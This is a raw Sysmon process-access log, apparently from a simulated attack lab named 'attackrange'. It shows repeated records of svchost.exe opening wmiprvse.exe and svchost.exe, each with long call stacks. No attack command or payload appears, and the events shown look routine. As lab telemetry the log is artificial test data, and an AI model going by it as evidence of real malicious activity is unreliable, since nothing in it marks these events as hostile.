13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.842{08A6967A-4288-6000-1500-000000009A01}13242456C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.295{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.295{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.295{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.295{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.295{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.295{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 